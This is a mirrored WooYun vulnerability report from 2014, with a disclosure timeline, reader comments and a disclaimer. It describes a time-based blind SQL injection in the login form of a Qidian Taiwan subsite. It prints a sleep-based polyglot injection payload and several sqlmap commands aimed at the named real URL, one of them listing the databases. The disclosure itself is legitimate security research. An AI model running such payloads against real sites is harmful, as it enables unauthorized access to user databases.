起点中文网某分站一处盲注

admin 2015年6月26日15:24:19评论352 views字数 195阅读0分39秒阅读模式
摘要

2014-09-29: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-13: 细节向公众公开

漏洞概要 关注数(4) 关注此漏洞

缺陷编号: WooYun-2014-77864

漏洞标题: 起点中文网某分站一处盲注

相关厂商: 盛大网络

漏洞作者: 大象

提交时间: 2014-09-29 22:44

公开时间: 2014-11-13 22:46

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 注射技巧

2人收藏


漏洞详情

披露状态:

2014-09-29: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-13: 细节向公众公开

简要描述:

基于时间的盲注,利用起来比较困难,但是安全无小事~~

详细说明:

https://members.qidian.com.tw/apps/login.php

会员登录处提交的参数未过滤,post的内容

code 区域
account=test&pwd=test1&comefrom_id=1&owner=COC&front_events_id=&front_events_name=&client_ip=123.123.123.31&url=http%3A%2F%2Fwww.qidian.com.tw&=%E7%99%BB%E5%85%A5&remember_me=1

响应时间0.5S

acount 处改为

code 区域
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ =>

响应时间6.5S,可见此处是可以进行时间盲注的。

经测试account,client_ip,front_events_id,front_events_name,url,owner这几个参数都是可注入的.

放到sqlmap里试试,竟然一个注入点都没跑出来,可能网络不太好,时间盲注对网络要求较高,又试了几次跑出acount一个点.

code 区域
sqlmap -u https://members.qidian.com.tw/apps/login.php  --data "account=test&pwd=test1&comefrom_id=1&owner=COC&front_events_id=&front_events_name=&client_ip=123.132.225.31&url=http%3A%2F%2Fwww.qidian.com.tw&=%E7%99%BB%E5%85%A5&remember_me=1" --technique T

起点中文网某分站一处盲注

想继续深入下发现连库都跑不出来。

修改了下 --time-sec参数,又跑出一个注入点。

code 区域
sqlmap -u https://members.qidian.com.tw/apps/login.php  --data "account=test&pwd=test1&comefrom_id=1&owner=COC&front_events_id=&front_events_name=&client_ip=123.132.123.31&url=http%3A%2F%2Fwww.qidian.com.tw&=%E7%99%BB%E5%85%A5&remember_me=1" --technique T --time-sec 20

起点中文网某分站一处盲注

这次换个参数注入可以继续了

code 区域
sqlmap -u https://members.qidian.com.tw/apps/login.php  --data "account=test&pwd=test1&comefrom_id=1&owner=COC&front_events_id=&front_events_name=&client_ip=123.132.225.31&url=http%3A%2F%2Fwww.qidian.com.tw&=%E7%99%BB%E5%85%A5&remember_me=1" --dbs --time-sec 20

起点中文网某分站一处盲注

漏洞证明:

时间盲注费时间,整了半天,才跑把几个库跑出来。

起点中文网某分站一处盲注

修复方案:

此处好像完全没有过滤啊......

版权声明:转载请注明来源 大象@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-09-29 23:06

厂商回复:

谢谢报告,跑不出数据来就对了,你懂的!

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

0%

0%

100%

0%

0%


评价

  1. 2014-09-29 23:29 | 子非海绵宝宝 起点中文网某分站一处盲注 ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

    0

    @盛大网络 这话说的相当有底气啊....看来有什么机制在里面

  2. 2014-10-24 22:20 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    @子非海绵宝宝 25个漏洞197rank....我还有9个没确认呢、哼、一定超过你

  3. 2014-11-14 12:00 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

    1

    @老和尚 你超不过了...

  4. 2015-05-13 17:29 | Tioyer ( 实习白帽子 | Rank:38 漏洞数:12 | 初来乍到,请各位大牛多多指教!)

    0

    您能给我个您的联系方式吗?

  5. 2015-05-13 20:53 | 大象 ( 实习白帽子 | Rank:86 漏洞数:37 | ~~~^_^~~~)

    0

    @Tioyer 有什么事么?可以邮件联系 shisithle#gamil.com

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin